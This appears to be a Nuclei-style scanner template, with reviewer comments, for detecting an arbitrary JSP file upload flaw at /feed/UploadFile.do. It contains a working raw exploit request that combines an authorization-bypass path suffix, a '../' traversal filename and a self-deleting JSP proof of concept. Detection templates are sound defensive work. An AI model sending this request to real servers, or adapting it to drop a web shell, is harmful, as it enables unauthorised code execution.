YAML脚本:
# Nuclei-style template (id/info/requests/matchers layout, {{Hostname}} variable)
# that probes a file-upload endpoint at /feed/UploadFile.do.
# NOTE(review): the indentation of this copy appears to have been lost, so the
# info/requests/matchers nesting below is not recoverable from whitespace alone.
id: file-upload-feed
info:
name: Arbitrary File Upload in /feed/UploadFile.do
# `author` is still the placeholder value; fill in before publishing the template.
author: your_name
severity: high
description: Detects arbitrary file upload vulnerability in /feed/UploadFile.do endpoint, allowing an attacker to upload and execute malicious JSP files.
tags: file-upload, rce, jsp
# Single raw multipart POST. Defender-relevant properties visible in the request:
#   - the request URI carries a `;.js.jsp` path-parameter suffix, and no session or
#     authorization header is sent;
#   - the multipart `filename` contains `../` segments (path traversal) while the
#     part's Content-Type claims image/jpeg;
#   - the JSP body prints a marker string, resolves its own path with
#     application.getRealPath(request.getServletPath()) and then deletes that file,
#     so the uploaded artifact does not persist on disk after it is executed.
# Detection therefore has to rely on access/WAF logs (POST to the endpoint with the
# `;` suffix, `../` in multipart filenames, the marker string in responses) rather
# than on finding the file. Server-side remediation is to reject filenames containing
# path separators and to store uploads outside any servlet-executed directory.
requests:
- raw:
- |
POST /feed/UploadFile.do;.js.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
Connection: close
------WebKitFormBoundaryxegqoxxi
Content-Disposition: form-data; name="file"; filename="/../../../../rce.jsp"
Content-Type: image/jpeg
<%@ page import="java.io.File" %>
<%
out.println("pppppppppoooooooocccccccccccc");
String filePath = application.getRealPath(request.getServletPath());
new File(filePath).delete();
%>
------WebKitFormBoundaryxegqoxxi--
# Matcher only looks for the literal filename in the upload response body. That is a
# weak confirmation: an error page that echoes the submitted filename would match
# too, and the match does not show the JSP was stored or executed.
matchers:
- type: word
words:
- 'rce.jsp' # checks whether the response body contains the submitted filename
part: body
上传成功
验证url
/rce.jsp;.js.jsp